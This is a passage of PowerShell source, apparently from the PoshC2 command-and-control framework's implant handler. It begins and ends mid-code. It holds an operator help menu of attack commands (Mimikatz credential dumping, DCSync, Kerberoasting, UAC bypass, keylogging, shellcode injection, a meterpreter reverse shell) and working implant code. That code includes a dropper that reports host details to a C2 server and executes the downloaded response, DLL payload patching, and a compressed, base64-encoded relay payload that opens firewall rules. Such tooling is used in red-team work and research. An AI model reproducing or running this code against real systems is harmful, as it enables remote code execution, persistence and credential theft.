$($item.ProxyUser) `n"} if ($item.ProxyPass) { $HelpOutput += "ProxyPass: $($item.ProxyPass) `n"} $HelpOutput += "Sounds: $($item.Sounds) `n" if ($item.APIKEY) { $HelpOutput += "APIKEY: $($item.APIKEY) `n"} if ($item.MobileNumber) { $HelpOutput += "MobileNumber: $($item.MobileNumber) `n"} $HelpOutput += "URLS: $($item.URLS) `n" $HelpOutput += "SocksURLS: $($item.SocksURLS) `n" $HelpOutput += "Insecure: $($item.Insecure) `n" $HelpOutput += "UserAgent: $($item.UserAgent) `n" if ($item.Referer) { $HelpOutput += "Referer: $($item.Referer) `n"} $HelpOutput } elseif ($global:implantid.ToLower().StartsWith("createproxypayload")) { $HelpOutput = IEX $global:implantid $HelpOutput } elseif ($global:implantid.ToLower().StartsWith("creds")) { $HelpOutput = IEX $global:implantid $HelpOutput } elseif ($global:implantid.ToLower().StartsWith("listmodules")) { Write-Host -Object "Reading modules from `$env:PSModulePath\* and $PoshPath\Modules\*" $folders = $env:PSModulePath -split ";" foreach ($item in $folders) { $PSmod = Get-ChildItem -Path $item -Include *.ps1 -Name foreach ($mod in $PSmod) { $HelpOutput += $mod + "`n" } } $listmodules = Get-ChildItem -Path "$PoshPath\Modules" -Name foreach ($mod in $listmodules) { $HelpOutput += $mod + "`n" } $HelpOutput } elseif ($global:implantid.Contains(",")) { $global:cmdlineinput = "PS $global:implantid>" break } elseif ($global:implantid -eq "ALL") { $global:cmdlineinput = "PS $global:implantid>" break } else { $global:randomuri = Invoke-SqliteQuery -DataSource $Database -Query "SELECT RandomURI FROM Implants WHERE ImplantID='$global:implantid'" -as SingleValue $global:cmdlineinput = "PS $global:implantid>" } } } $tick = "'" $speechmarks = '"' function print-mainhelp { write-host `n "Main Menu: " -ForegroundColor Green write-host "================================" -ForegroundColor Red write-host " Use Implant by <id>, e.g. 1"-ForegroundColor Green write-host " Use Multiple Implants by <id>,<id>,<id>, e.g. 1,2,5"-ForegroundColor Green write-host " Use ALL Implants by ALL" -ForegroundColor Green write-host `n "Auto-Runs: " -ForegroundColor Green write-host "=====================" -ForegroundColor Red write-host " Add-autorun <task>"-ForegroundColor Green write-host " List-autorun (Alias: L)"-ForegroundColor Green write-host " Del-autorun <taskID>"-ForegroundColor Green write-host " Nuke-autorun"-ForegroundColor Green write-host " Automigrate-FromPowershell (Alias: AM)"-ForegroundColor Green write-host `n "Server Commands: " -ForegroundColor Green write-host "=====================" -ForegroundColor Red write-host " Show-ServerInfo" -ForegroundColor Green write-host " History"-ForegroundColor Green write-host " Output-To-HTML"-ForegroundColor Green write-host " Set-ClockworkSMSApiKey df2----"-ForegroundColor Green write-host " Set-ClockworkSMSNumber 44789----"-ForegroundColor Green write-host " Set-DefaultBeacon 60"-ForegroundColor Green write-host " ListModules " -ForegroundColor Green write-host " PwnSelf (Alias: P)" -ForegroundColor Green write-host " Creds -Action <dump/add/del/search> -Username <username> -password/-hash"-ForegroundColor Green write-host " CreateNewPayload -hostname https://hostname.com -domainfrontheader <url> " -ForegroundColor Green write-host " CreateProxyPayload -user <dom\user> -pass <pass> -proxyurl <http://10.0.0.1:8080>" -ForegroundColor Green } function print-help($t=0) { if (($t -eq 1) -or ($t -eq 0)) { write-host `n "Implant Features: " -ForegroundColor Green write-host "=====================" -ForegroundColor Red write-host " Beacon 60s / Beacon 10m / Beacon 2h"-ForegroundColor Green write-host " Turtle 60s / Turtle 30m / Turtle 8h "-ForegroundColor Green write-host " Kill-Implant"-ForegroundColor Green write-host " Hide-Implant"-ForegroundColor Green write-host " Unhide-Implant"-ForegroundColor Green write-host " Invoke-Enum"-ForegroundColor Green write-host " Get-Proxy"-ForegroundColor Green write-host " Get-ComputerInfo"-ForegroundColor Green write-host " Unzip <source file> <destination folder>"-ForegroundColor Green write-host " Get-System" -ForegroundColor Green write-host " Get-System-WithProxy" -ForegroundColor Green write-host " Get-System-WithDaisy" -ForegroundColor Green write-host " Get-ImplantWorkingDirectory"-ForegroundColor Green write-host " Get-Pid" -ForegroundColor Green write-host " Posh-Delete C:\Temp\svc.exe" -ForegroundColor Green write-host " Get-Webpage http://intranet" -ForegroundColor Green write-host " ListModules " -ForegroundColor Green write-host " ModulesLoaded " -ForegroundColor Green write-host " LoadModule <modulename>" -ForegroundColor Green write-host " LoadModule Inveigh.ps1" -ForegroundColor Green write-host " Get-UserInfo" -ForegroundColor Green write-host " Invoke-HostEnum -All" -ForegroundColor Green write-host " Find-AllVulns" -ForegroundColor Green write-host " Invoke-Expression (Get-Webclient).DownloadString(`"https://module.ps1`")" -ForegroundColor Green write-host " StartAnotherImplant or SAI" -ForegroundColor Green write-host " Invoke-DaisyChain -name dc1daisy -daisyserver http://192.168.1.1 -port 80 -c2port 80 -c2server http://c2.goog.com -domfront aaa.clou.com -proxyurl http://10.0.0.1:8080 -proxyuser dom\test -proxypassword pass -localhost (optional if low level user)" -ForegroundColor Green write-host " CreateProxyPayload -user <dom\user> -pass <pass> -proxyurl <http://10.0.0.1:8080>" -ForegroundColor Green write-host " Get-MSHotfixes" -ForegroundColor Green write-host " Get-FireWallRulesAll | Out-String -Width 200" -ForegroundColor Green write-host " EnableRDP" -ForegroundColor Green write-host " DisableRDP" -ForegroundColor Green write-host " Netsh.exe advfirewall firewall add rule name=`"EnableRDP`" dir=in action=allow protocol=TCP localport=any enable=yes" -ForegroundColor Green write-host " Get-WLANPass" -ForegroundColor Green write-host " Get-WmiObject -Class Win32_Product" -ForegroundColor Green write-host " Get-CreditCardData -Path 'C:\Backup\'" -ForegroundColor Green write-host " TimeStomp C:\Windows\System32\Service.exe `"01/03/2008 12:12 pm`"" -ForegroundColor Green write-host " iCacls C:\Windows\System32\ResetPassword.exe /grant Administrator:F" -ForegroundColor Green write-host " Get-AllFirewallRules C:\temp\rules.csv" -ForegroundColor Green write-host " Get-AllServices" -ForegroundColor Green } if (($t -eq 0) -or ($t -eq 2)) { write-host `n "Privilege Escalation: " -ForegroundColor Green write-host "====================" -ForegroundColor Red write-host " Invoke-AllChecks" -ForegroundColor Green write-host " Invoke-UACBypass" -ForegroundColor Green write-host " Invoke-UACBypassProxy" -ForegroundColor Green Write-Host ' Get-MSHotFixes | Where-Object {$_.hotfixid -eq "KB2852386"}' -ForegroundColor Green write-host " Invoke-MS16-032" -ForegroundColor Green write-host " Invoke-MS16-032-ProxyPayload" -ForegroundColor Green write-host " Get-GPPPassword" -ForegroundColor Green write-host " Get-Content 'C:\ProgramData\McAfee\Common Framework\SiteList.xml'" -ForegroundColor Green write-host " Dir -Recurse | Select-String -pattern 'password='" -ForegroundColor Green } if (($t -eq 0) -or ($t -eq 3)) { write-host `n "File Management: " -ForegroundColor Green write-host "====================" -ForegroundColor Red write-host " Download-File -Source 'C:\Temp Dir\Run.exe'" -ForegroundColor Green write-host " Download-Files -Directory 'C:\Temp Dir\'" -ForegroundColor Green write-host " Upload-File -Source 'C:\Temp\Run.exe' -Destination 'C:\Temp\Test.exe'" -ForegroundColor Green write-host " Web-Upload-File -From 'http://www.example.com/App.exe' -To 'C:\Temp\App.exe' " -ForegroundColor Green write-host `n "Persistence: " -ForegroundColor Green write-host "================" -ForegroundColor Red write-host " Install-Persistence 1,2,3 " -ForegroundColor Green write-host " Remove-Persistence 1,2,3" -ForegroundColor Green write-host " InstallExe-Persistence" -ForegroundColor Green write-host " RemoveExe-Persistence" -ForegroundColor Green write-host " Install-ServiceLevel-Persistence | Remove-ServiceLevel-Persistence" -ForegroundColor Green write-host " Install-ServiceLevel-PersistenceWithProxy | Remove-ServiceLevel-Persistence" -ForegroundColor Green write-host `n "Network Tasks / Lateral Movement: " -ForegroundColor Green write-host "==================" -ForegroundColor Red write-host " Get-ExternalIP" -ForegroundColor Green write-host " Test-ADCredential -Domain test -User ben -Password Password1" -ForegroundColor Green write-host " Invoke-SMBLogin -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash/-Password" -ForegroundColor Green write-host " Invoke-SMBExec -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash/-Pass -Command `"net user SMBExec Winter2017 /add`"" -ForegroundColor Green write-host " Invoke-WMIExec -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash/-Pass -Command `"net user SMBExec Winter2017 /add`"" -ForegroundColor Green write-host " Net View | Net Users | Net localgroup administrators | Net Accounts /dom " -ForegroundColor Green write-host " Whoami /groups | Whoami /priv " -ForegroundColor Green } if (($t -eq 0) -or ($t -eq 4)) { write-host `n "Active Directory Enumeration: " -ForegroundColor Green write-host "==================" -ForegroundColor Red write-host " Invoke-ACLScanner" -ForegroundColor Green write-host " Get-ObjectACL -ResolveGUIDs -SamAccountName john" -ForegroundColor Green write-host " Add-ObjectACL -TargetSamAccountName arobbins -PrincipalSamAccountName harmj0y -Rights ResetPassword" -ForegroundColor Green write-host " Get-Netuser -admincount | select samaccountname" -ForegroundColor Green write-host " Get-DomainUser -UACFilter NOT_PASSWORD_EXPIRED,NOT_ACCOUNTDISABLE -Properties samaccountname,pwdlastset | Export-Csv act.csv" -ForegroundColor Green write-host " Get-Netgroup -admincount | select samaccountname" -ForegroundColor Green write-host " Get-NetGroupMember `"Domain Admins`" -recurse|select membername" -ForegroundColor Green write-host ' Get-NetComputer | Select-String -pattern "Citrix" ' -ForegroundColor Green write-host ' Get-NetComputer -filter operatingsystem=*7*|select name' -ForegroundColor Green write-host ' Get-NetComputer -filter operatingsystem=*2008*|select name' -ForegroundColor Green write-host " Get-DomainComputer -LDAPFilter `"(|(operatingsystem=*7*)(operatingsystem=*2008*))`" -SPN `"wsman*`" -Properties dnshostname,serviceprincipalname,operatingsystem,distinguishedname | fl" -ForegroundColor Green write-host ' Get-NetGroup | Select-String -pattern "Internet" ' -ForegroundColor Green write-host ' Get-NetUser -Filter | Select-Object samaccountname,userprincipalname' -ForegroundColor Green write-host ' Get-NetUser -Filter samaccountname=test' -ForegroundColor Green write-host ' Get-NetUser -Filter userprinciplename=test@test.com' -ForegroundColor Green write-host ' Get-NetGroup | select samaccountname' -ForegroundColor Green write-host ' Get-NetGroup "*BEN*" | select samaccountname ' -ForegroundColor Green write-host ' Get-NetGroupMember "Domain Admins" -recurse|select membername' -ForegroundColor Green write-host ' Get-NetShare Hostname' -ForegroundColor Green write-host " Invoke-ShareFinder -Verbose -CheckShareAccess" -ForegroundColor Green write-host " New-PSDrive -Name `"P`" -PSProvider `"FileSystem`" -Root `"\\bloredc1\netlogon`"" -ForegroundColor Green write-host `n "Domain Trusts: " -ForegroundColor Green write-host "==================" -ForegroundColor Red write-host " Get-NetDomain | Get-NetDomainController | Get-NetForestDomain" -ForegroundColor Green write-host " Invoke-MapDomainTrust" -ForegroundColor Green write-host ' Get-NetUser -domain child.parent.com -Filter samaccountname=test' -ForegroundColor Green write-host ' Get-NetGroup -domain child.parent.com | select samaccountname' -ForegroundColor Green } if (($t -eq 0) -or ($t -eq 5)) { write-host `n "Domain / Network Tasks: " -ForegroundColor Green write-host "==================" -ForegroundColor Red write-host " Invoke-BloodHound -CollectionMethod 'Stealth' -CSVFolder C:\temp\" -ForegroundColor Green write-host " Get-NetDomainController | Select name | get-netsession | select *username,*CName" -ForegroundColor Green write-host " Get-DFSshare | get-netsession | Select *username,*CName" -ForegroundColor Green write-host " Get-NetFileServer | get-netsession | Select *username,*CName" -ForegroundColor Green write-host " Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash" -ForegroundColor Green write-host " Write-SCFFile -IPaddress 127.0.0.1 -Location \\localhost\c$\temp\" -ForegroundColor Green write-host " Write-INIFile -IPaddress 127.0.0.1 -Location \\localhost\c$\temp\" -ForegroundColor Green write-host ' Get-NetGroup | Select-String -pattern "Internet" ' -ForegroundColor Green write-host " Invoke-Hostscan -IPRangeCIDR 172.16.0.0/24 (Provides list of hosts with 445 open)" -ForegroundColor Green write-host " Get-NetFileServer -Domain testdomain.com" -ForegroundColor Green write-host " Find-InterestingFile -Path \\SERVER\Share -OfficeDocs -LastAccessTime (Get-Date).AddDays(-7)" -ForegroundColor Green write-host " Brute-AD" -ForegroundColor Green write-host " Brute-LocAdmin -Username administrator" -ForegroundColor Green Write-Host " Get-PassPol" -ForegroundColor Green Write-Host " Get-PassNotExp" -ForegroundColor Green Write-Host " Get-LocAdm" -ForegroundColor Green Write-Host " Invoke-Inveigh -HTTP Y -Proxy Y -NBNS Y -Tool 1" -ForegroundColor Green Write-Host " Get-Inveigh | Stop-Inveigh (Gets Output from Inveigh Thread)" -ForegroundColor Green Write-Host " Invoke-Sniffer -OutputFile C:\Temp\Output.txt -MaxSize 50MB -LocalIP 10.10.10.10" -ForegroundColor Green Write-Host " Invoke-SqlQuery -sqlServer 10.0.0.1 -User sa -Pass sa -Query 'SELECT @@VERSION'" -ForegroundColor Green Write-Host " Invoke-Runas -User <user> -Password '<pass>' -Domain <dom> -Command C:\Windows\System32\cmd.exe -Args `" /c calc.exe`"" -ForegroundColor Green Write-Host " Invoke-Pipekat -Target <ip-optional> -Domain <dom> -Username <user> -Password '<pass>' -Hash <hash-optional>" -ForegroundColor Green write-host " Invoke-WMIExec -Target <ip> -Domain <dom> -Username <user> -Password '<pass>' -Hash <hash-optional> -command <cmd>" -ForegroundColor Green } if (($t -eq 0) -or ($t -eq 6)) { write-host `n "Lateral Movement: " -ForegroundColor Green write-host "=========================================================" -ForegroundColor Red Write-Host " Invoke-RunasPayload -User <user> -Password '<pass>' -Domain <dom>" -ForegroundColor Green Write-Host " Invoke-RunasProxyPayload -User <user> -Password '<pass>' -Domain <dom>" -ForegroundColor Green Write-Host " Invoke-RunasDaisyPayload -User <user> -Password '<pass>' -Domain <dom>" -ForegroundColor Green write-host " Invoke-DCOMPayload -Target <ip>" -ForegroundColor Green write-host " Invoke-DCOMProxyPayload -Target <ip>" -ForegroundColor Green write-host " Invoke-DCOMDaisyPayload -Target <ip>" -ForegroundColor Green write-host " Invoke-PsExecPayload -Target <ip> -Domain <dom> -User <user> -pass '<pass>' -Hash <hash-optional>" -ForegroundColor Green write-host " Invoke-PsExecProxyPayload -Target <ip> -Domain <dom> -User <user> -pass '<pass>' -Hash <hash-optional>" -ForegroundColor Green write-host " Invoke-PsExecDaisyPayload -Target <ip> -Domain <dom> -User <user> -pass '<pass>' -Hash <hash-optional>" -ForegroundColor Green write-host " Invoke-WMIPayload -Target <ip> -Domain <dom> -Username <user> -Password '<pass>' -Hash <hash-optional>" -ForegroundColor Green write-host " Invoke-WMIProxyPayload -Target <ip> -Domain <dom> -User <user> -pass '<pass>' -Hash <hash-optional>" -ForegroundColor Green write-host " Invoke-WMIDaisyPayload -Target <ip> -Domain <dom> -user <user> -pass '<pass>'" -ForegroundColor Green write-host " Invoke-WinRMSession -IPAddress <ip> -user <dom\user> -pass <pass>" -ForegroundColor Green } if (($t -eq 0) -or ($t -eq 7)) { write-host `n "Credentials / Tokens / Local Hashes (Must be SYSTEM): " -ForegroundColor Green write-host "=========================================================" -ForegroundColor Red write-host " Invoke-Mimikatz | Out-String | Parse-Mimikatz" -ForegroundColor Green write-host " Invoke-Mimikatz -Command $($tick)$($speechmarks)sekurlsa::logonpasswords$($speechmarks)$($tick)" -ForegroundColor Green write-host " Invoke-Mimikatz -Command $($tick)$($speechmarks)lsadump::sam$($speechmarks)$($tick)" -ForegroundColor Green write-host " Invoke-Mimikatz -Command $($tick)$($speechmarks)lsadump::lsa$($speechmarks)$($tick)" -ForegroundColor Green write-host " Invoke-Mimikatz -Command $($tick)$($speechmarks)lsadump::cache$($speechmarks)$($tick)" -ForegroundColor Green write-host " Invoke-Mimikatz -Command $($tick)$($speechmarks)ts::multirdp$($speechmarks)$($tick)" -ForegroundColor Green write-host " Invoke-Mimikatz -Command $($tick)$($speechmarks)privilege::debug$($speechmarks)$($tick)" -ForegroundColor Green write-host " Invoke-Mimikatz -Command $($tick)$($speechmarks)crypto::capi$($speechmarks)$($tick)" -ForegroundColor Green write-host " Invoke-Mimikatz -Command $($tick)$($speechmarks)crypto::certificates /export$($speechmarks)$($tick)" -ForegroundColor Green write-host " Invoke-Mimikatz -Command $($tick)$($speechmarks)sekurlsa::pth /user:<user> /domain:<dom> /ntlm:<HASH> /run:c:\temp\run.bat$($speechmarks)$($tick)" -ForegroundColor Green write-host " Invoke-Mimikatz -Computer 10.0.0.1 -Command $($tick)$($speechmarks)sekurlsa::pth /user:<user> /domain:<dom> /ntlm:<HASH> /run:c:\temp\run.bat$($speechmarks)$($tick)" -ForegroundColor Green write-host " Invoke-TokenManipulation | Select-Object Domain, Username, ProcessId, IsElevated, TokenType | ft -autosize | Out-String" -ForegroundColor Green write-host ' Invoke-TokenManipulation -ImpersonateUser -Username "Domain\User"' -ForegroundColor Green write-host `n "Credentials / Domain Controller Hashes: " -ForegroundColor Green write-host "============================================" -ForegroundColor Red write-host " Invoke-Mimikatz -Command $($tick)$($speechmarks)lsadump::dcsync /domain:domain.local /user:administrator$($speechmarks)$($tick)" -ForegroundColor Green write-host " Invoke-DCSync -PWDumpFormat" -ForegroundColor Green write-host " Dump-NTDS -EmptyFolder <emptyfolderpath>" -ForegroundColor Green } if (($t -eq 0) -or ($t -eq 8)) { write-host `n "Useful Modules: " -ForegroundColor Green write-host "====================" -ForegroundColor Red write-host " Get-Screenshot" -ForegroundColor Green write-host " Get-ScreenshotAllWindows" -ForegroundColor Green write-host " Get-ScreenshotMulti -Timedelay 120 -Quantity 30" -ForegroundColor Green write-host " Get-RecentFiles" -ForegroundColor Green write-host " Cred-Popper" -ForegroundColor Green write-host " Get-Clipboard" -ForegroundColor Green write-host " Hashdump" -ForegroundColor Green write-host ' Get-Keystrokes' -ForegroundColor Green write-host " ArpScan -IPCidr 10.0.0.1/24" -ForegroundColor Green write-host " PortScan -IPaddress 10.0.0.1-50 -Ports `"1-65535`" -maxQueriesPS 10000 -delay 0" -ForegroundColor Green write-host " Invoke-UserHunter -StopOnSuccess" -ForegroundColor Green write-host " Migrate" -ForegroundColor Green write-host " Migrate -x64 -ProcID 444" -ForegroundColor Green write-host " Migrate -x64 -ProcessPath C:\Windows\System32\cmd.exe" -ForegroundColor Green write-host " Migrate -x86" -ForegroundColor Green write-host " Migrate-x64 -ProcID 4444" -ForegroundColor Green write-host " Migrate-x64 -ProcessPath C:\Windows\System32\cmd.exe" -ForegroundColor Green write-host " Migrate-x86 -ProcessPath C:\Windows\System32\cmd.exe" -ForegroundColor Green write-host " Migrate-Proxy-x86 -ProcID 4444" -ForegroundColor Green write-host " Migrate-Proxy-x64 -ProcID 444" -ForegroundColor Green write-host " Migrate-Daisy-x86 -Name DC1 -ProcID 444" -ForegroundColor Green write-host " Migrate-Daisy-x64 -Name DC2" -ForegroundColor Green write-host " Inject-Shellcode -x86 -Shellcode (GC C:\Temp\Shellcode.bin -Encoding byte) -ProcID 5634" -ForegroundColor Green write-host " Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 172.16.0.100 -Lport 443 -Force" -ForegroundColor Green write-host ' Get-Eventlog -newest 10000 -instanceid 4624 -logname security | select message -ExpandProperty message | select-string -pattern "user1|user2|user3"' -ForegroundColor Green write-host ' Send-MailMessage -to "itdept@test.com" -from "User01 <user01@example.com>" -subject <> -smtpServer <> -Attachment <>'-ForegroundColor Green write-host ' SharpSocks -Uri http://www.c2.com:9090 -Beacon 2000 -Insecure' -ForegroundColor Green write-host `n "Implant Handler: " -ForegroundColor Green write-host "=====================" -ForegroundColor Red write-host " Back" -ForegroundColor Green write-host " Exit" `n -ForegroundColor Green } } $command = '[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} function Get-Webclient ($Cookie) { $d = (Get-Date -Format "dd/MM/yyyy"); $d = [datetime]::ParseExact($d,"dd/MM/yyyy",$null); $k = [datetime]::ParseExact("'+$killdatefm+'","dd/MM/yyyy",$null); if ($k -lt $d) {exit} $wc = New-Object System.Net.WebClient; $wc.UseDefaultCredentials = $true; $wc.Proxy.Credentials = $wc.Credentials; $h="'+$domainfrontheader+'" if ($h) {$wc.Headers.Add("Host",$h)} $wc.Headers.Add("User-Agent","'+$useragent+'") if ($cookie) { $wc.Headers.Add([System.Net.HttpRequestHeader]::Cookie, "SessionID=$Cookie") } $wc } function primer { if ($env:username -eq $env:computername+"$"){$u="SYSTEM"}else{$u=$env:username} $pre = [System.Text.Encoding]::Unicode.GetBytes("$env:userdomain\$u;$u;$env:computername;$env:PROCESSOR_ARCHITECTURE;$pid") $p64 = [Convert]::ToBase64String($pre) $pm = (Get-Webclient -Cookie $p64).downloadstring("'+$ipv4address+":"+$serverport+'/connect") $pm = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($pm)) $pm } $pm = primer if ($pm) {$pm| iex} else { start-sleep 10 primer | iex }' function Get-RandomURI { param ( [int]$Length ) $set = 'abcdefghijklmnopqrstuvwxyz0123456789'.ToCharArray() $result = '' for ($x = 0; $x -lt $Length; $x++) { $result += $set | Get-Random } return $result } function Create-AesManagedObject { param ( [Object] $key, [Object] $IV ) $aesManaged = New-Object -TypeName 'System.Security.Cryptography.RijndaelManaged' $aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC $aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros $aesManaged.BlockSize = 128 $aesManaged.KeySize = 256 if ($IV) { if ($IV.getType().Name -eq 'String') {$aesManaged.IV = [System.Convert]::FromBase64String($IV)} else {$aesManaged.IV = $IV} } if ($key) { if ($key.getType().Name -eq 'String') {$aesManaged.Key = [System.Convert]::FromBase64String($key)} else {$aesManaged.Key = $key} } $aesManaged } function Create-AesKey() { $aesManaged = Create-AesManagedObject $aesManaged.GenerateKey() [System.Convert]::ToBase64String($aesManaged.Key) } function PatchDll { param($dllBytes, $replaceString, $Arch, $offset) if ($Arch -eq 'x86') { $dllOffset = 0x00012F80 } if ($Arch -eq 'x64') { $dllOffset = 0x00017300 } if($offset) { $dllOffset = $offset } $replaceStringBytes = ([System.Text.Encoding]::UNICODE).GetBytes($replaceString) $dllLength = $replaceString.Length $patchLength = 8000 -$dllLength $nullString = 0x00*$patchLength $nullBytes = ([System.Text.Encoding]::UNICODE).GetBytes($nullString) $nullBytes = $nullBytes[1..$patchLength] $replaceNewStringBytes = ($replaceStringBytes+$nullBytes) $dllLength = 16000 -2 $i=0 $dllOffset..($dllOffset + $dllLength) | % { $dllBytes[$_] = $replaceNewStringBytes[$i] $i++ } return $DllBytes } function CreateNewPayload { param ( [Parameter(Mandatory=$true)][AllowEmptyString()][string]$hostname, [Parameter(Mandatory=$false)][AllowEmptyString()][string]$domainfrontheader ) if ($Insecure -eq "Yes") { $command = createdropper -enckey $enckey -killdate $killdatefm -domainfrontheader $DomainFrontHeader -ipv4address $hostname -serverport $serverport -Insecure -useragent $useragent -Referer $Referer } else { $command = createdropper -enckey $enckey -killdate $killdatefm -domainfrontheader $DomainFrontHeader -ipv4address $hostname -serverport $serverport -useragent $useragent -Referer $Referer } $dom = $hostname -replace "https://","" $dom = $dom -replace "http://","" $payload = createrawpayload -command $command CreatePayload -Domain $dom CreateStandAloneExe -Domain $dom CreateDLL -Domain $dom } function CreateProxyPayload { param ( [Parameter(Mandatory=$true)][AllowEmptyString()][string]$username, [Parameter(Mandatory=$true)][AllowEmptyString()][string]$password, [Parameter(Mandatory=$true)][string]$proxyurl ) if ($Insecure -eq "Yes") { $command = createdropper -enckey $enckey -Proxy -killdate $killdatefm -domainfrontheader $DomainFrontHeader -ipv4address $ipv4address -serverport $serverport -username $username -password $password -proxyurl $proxyurl -Insecure -useragent $useragent -Referer $Referer } else { $command = createdropper -enckey $enckey -Proxy -killdate $killdatefm -domainfrontheader $DomainFrontHeader -ipv4address $ipv4address -serverport $serverport -username $username -password $password -proxyurl $proxyurl -useragent $useragent -Referer $Referer } $payload = createrawpayload -command $command CreatePayload -Proxy 1 CreateStandAloneExe -Proxy 1 CreateServiceExe -Proxy 1 CreateDLL -Proxy 1 } function Invoke-DaisyChain { param( [Parameter(Mandatory=$true)][string]$name, [Parameter(Mandatory=$true)][string]$port, [Parameter(Mandatory=$true)][string]$daisyserver, [Parameter(Mandatory=$true)][string]$c2server, [Parameter(Mandatory=$true)][string]$c2port, [Parameter(Mandatory=$false)][switch]$Localhost, [Parameter(Mandatory=$false)][AllowEmptyString()][string]$domfront, [Parameter(Mandatory=$false)][AllowEmptyString()][string]$proxyurl, [Parameter(Mandatory=$false)][AllowEmptyString()][string]$proxyuser, [Parameter(Mandatory=$false)][AllowEmptyString()][string]$proxypassword) $firewallName = Get-RandomURI -Length 15 $fw = Read-Host "Do you want to create a firewall rule for this: Y/N" if ($fw -eq "Y") { $fwcmd = "Netsh.exe advfirewall firewall add rule name=`"$firewallName`" dir=in action=allow protocol=TCP localport=$port enable=yes" } if ($Localhost.IsPresent){ $HTTPServer = "localhost" $daisyserver = "http://localhost" } else { $HTTPServer = "+" } $command = createdropper -enckey $enckey -Daisy -killdate $killdatefm -ipv4address $daisyserver -serverport $port -Referer $Referer $payload = createrawpayload -command $command CreatePayload -DaisyName $name CreateStandAloneExe -DaisyName $name CreateServiceExe -DaisyName $name CreateDLL -DaisyName $name [IO.File]::WriteAllLines("$FolderPath\payloads\$($name).bat", $payload) Write-Host -Object "Payload written to: $FolderPath\payloads\$($name).bat" -ForegroundColor Green $fdsf = @" `$username = "$proxyuser" `$password = "$proxypassword" `$proxyurl = "$proxyurl" `$domainfrontheader = "$domfront" `$serverport = '$port' `$Server = "${c2server}:${c2port}" [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {`$true} function Get-Webclient (`$Cookie) { `$d = (Get-Date -Format "dd/MM/yyyy"); `$d = [datetime]::ParseExact(`$d,"dd/MM/yyyy",`$null); `$k = [datetime]::ParseExact("$killdatefm","dd/MM/yyyy",`$null); if (`$k -lt `$d) {exit} `$username = `$username `$password = `$password `$proxyurl = `$proxyurl `$wc = New-Object System.Net.WebClient; `$wc.Headers.Add("User-Agent","$useragent") `$wc.Headers.Add("Referer","$referer") `$h=`$domainfrontheader if (`$h) {`$wc.Headers.Add("Host",`$h)} if (`$proxyurl) { `$wp = New-Object System.Net.WebProxy(`$proxyurl,`$true); `$wc.Proxy = `$wp; } if (`$username -and `$password) { `$PSS = ConvertTo-SecureString `$password -AsPlainText -Force; `$getcreds = new-object system.management.automation.PSCredential `$username,`$PSS; `$wp.Credentials = `$getcreds; } else { `$wc.UseDefaultCredentials = `$true; } if (`$cookie) { `$wc.Headers.Add([System.Net.HttpRequestHeader]::Cookie, "SessionID=`$Cookie") } `$wc } `$httpresponse = ' <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL/s was not found on this server.</p> <hr> <address>Apache (Debian) Server</address> </body></html> ' `$URLS = $($URLS),$($SocksURLS) `$listener = New-Object -TypeName System.Net.HttpListener `$listener.Prefixes.Add("http://$($HTTPServer):`$serverport/") `$listener.Start() echo "started http server" while (`$listener.IsListening) { if (`$kill.log -eq 2) {`$listener.Stop();exit} `$message = `$null `$context = `$listener.GetContext() `$request = `$context.Request `$response = `$context.Response `$url = `$request.RawUrl `$method = `$request.HttpMethod if (`$null -ne (`$URLS | ? { `$url -match `$_ }) ) { `$cookiesin = `$request.Cookies -replace 'SessionID=', '' `$responseStream = `$request.InputStream `$targetStream = New-Object -TypeName System.IO.MemoryStream `$buffer = new-object byte[] 10KB `$count = `$responseStream.Read(`$buffer,0,`$buffer.length) `$downloadedBytes = `$count while (`$count -gt 0) { `$targetStream.Write(`$buffer, 0, `$count) `$count = `$responseStream.Read(`$buffer,0,`$buffer.length) `$downloadedBytes = `$downloadedBytes + `$count } `$len = `$targetStream.length `$size = `$len + 1 `$size2 = `$len -1 `$buffer = New-Object byte[] `$size `$targetStream.Position = 0 `$targetStream.Read(`$buffer, 0, `$targetStream.Length)|Out-null `$buffer = `$buffer[0..`$size2] `$targetStream.Flush() `$targetStream.Close() `$targetStream.Dispose() [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {`$true} if (`$method -eq "GET") { `$message = (Get-Webclient -Cookie `$cookiesin).DownloadString("`$(`$Server)`$(`$url)") } if (`$method -eq "POST") { `$message = (Get-Webclient -Cookie `$cookiesin).UploadData("`$(`$Server)`$(`$url)", `$buffer) } } if (!`$message) { `$message = `$httpresponse echo `$request } [byte[]] `$buffer = [System.Text.Encoding]::UTF8.GetBytes(`$message) `$response.ContentLength64 = `$buffer.length `$response.StatusCode = 200 `$response.Headers.Add("CacheControl", "no-cache, no-store, must-revalidate") `$response.Headers.Add("Pragma", "no-cache") `$response.Headers.Add("Expires", 0) `$output = `$response.OutputStream `$output.Write(`$buffer, 0, `$buffer.length) `$output.Close() `$message = `$null } `$listener.Stop() "@ $ScriptBytes = ([Text.Encoding]::ASCII).GetBytes($fdsf) $CompressedStream = New-Object IO.MemoryStream $DeflateStream = New-Object IO.Compression.DeflateStream ($CompressedStream, [IO.Compression.CompressionMode]::Compress) $DeflateStream.Write($ScriptBytes, 0, $ScriptBytes.Length) $DeflateStream.Dispose() $CompressedScriptBytes = $CompressedStream.ToArray() $CompressedStream.Dispose() $EncodedCompressedScript = [Convert]::ToBase64String($CompressedScriptBytes) $NewScript = 'sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(' + "'$EncodedCompressedScript'" + '),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()' $UnicodeEncoder = New-Object System.Text.UnicodeEncoding $EncodedPayloadScript = [Convert]::ToBase64String($UnicodeEncoder.GetBytes($NewScript)) $rundaisy = @" $fwcmd `$t = Invoke-Netstat| ? {`$_.ListeningPort -eq $port} `$global:kill = 